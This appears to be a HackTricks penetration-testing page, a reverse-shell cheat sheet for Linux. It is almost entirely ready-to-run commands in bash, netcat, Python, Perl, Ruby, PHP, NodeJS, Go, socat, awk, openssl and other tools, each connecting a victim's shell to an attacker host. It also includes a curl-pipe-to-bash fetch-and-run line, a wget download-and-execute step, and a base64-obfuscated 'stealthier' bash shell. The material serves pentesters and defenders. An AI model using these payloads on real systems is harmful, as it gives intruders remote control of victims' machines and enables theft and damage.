HackTricks
Search…
Pentesting
Shells - Linux
If you have questions about any of these shells you could check them with https://explainshell.com/

Full TTY

Once you get a reverse shell read this page to obtain a full TTY.

Bash | sh

1
curl http://reverse-shell.sh/1.1.1.1:3000 | bash
2
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
3
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
4
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
5
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
6
#Short and bypass (cretdits to Dikline)
7
(sh)0>/dev/tcp/10.10.10.10/9091
8
#after getting the previous shell, to get the output execute
9
exec >&0
Copied!
Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

Symbol safe shell

1
#If you need a more stable connection do:
2
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
3
4
#Stealthier method
5
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
6
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
Copied!

Create in file and execute

1
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
2
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
Copied!

Netcat

1
nc -e /bin/sh <ATTACKER-IP> <PORT>
2
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
4
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
5
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
Copied!

Telnet

1
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
3
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
4
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
Copied!

Whois

Attacker
1
while true; do nc -l <port>; done
Copied!
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
Victim
1
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
Copied!

Python

1
#Linux
2
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
3
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4
#IPv6
5
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
Copied!

Perl

1
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Copied!

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
2
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Copied!

PHP

1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
2
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Copied!

Java

1
r = Runtime.getRuntime()
2
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3
p.waitFor()
Copied!

Ncat

1
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
2
attacker> ncat -v 10.0.0.22 4444 --ssl
Copied!

Golang

1
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Copied!

Lua

1
#Linux
2
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
3
#Windows & Linux
4
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
Copied!

NodeJS

1
(function(){
2
var net = require("net"),
3
cp = require("child_process"),
4
sh = cp.spawn("/bin/sh", []);
5
var client = new net.Socket();
6
client.connect(8080, "10.17.26.64", function(){
7
client.pipe(sh.stdin);
8
sh.stdout.pipe(client);
9
sh.stderr.pipe(client);
10
});
11
return /a/; // Prevents the Node.js application form crashing
12
})();
13
14
15
or
16
17
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
18
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
19
20
or
21
22
-var x = global.process.mainModule.require
23
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
24
25
or
26
27
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
Copied!

OpenSSH

Attacker (Kali)
1
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
2
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
3
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
Copied!
Victim
1
#Linux
2
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
3
4
#Windows
5
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
Copied!

Socat

Bind shell

1
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
2
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
Copied!

Reverse shell

1
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
2
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
Copied!

Awk

1
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Copied!

Finger

Attacker
1
while true; do nc -l 79; done
Copied!
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
Victim
1
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
2
3
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
Copied!

Gawk

1
#!/usr/bin/gawk -f
2
3
BEGIN {
4
Port = 8080
5
Prompt = "bkd> "
6
7
Service = "/inet/tcp/" Port "/0/0"
8
while (1) {
9
do {
10
printf Prompt |& Service
11
Service |& getline cmd
12
if (cmd) {
13
while ((cmd |& getline) > 0)
14
print $0 |& Service
15
close(cmd)
16
}
17
} while (cmd != "exit")
18
close(Service)
19
}
20
}
Copied!

Xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
1
xterm -display 10.0.0.1:1
Copied!
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
1
Xnest :1
Copied!
You’ll need to authorise the target to connect to you (command also run on your host):
1
xhost +targetip
Copied!

Groovy

by frohoff NOTE: Java reverse shell also work for Groovy
1
String host="localhost";
2
int port=8044;
3
String cmd="cmd.exe";
4
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Copied!

Bibliography

Reverse Shell Cheat Sheet
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell
pentestmonkey.net
Using Whois and Finger for Reverse Shells
PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings
GitHub
Last modified 24d ago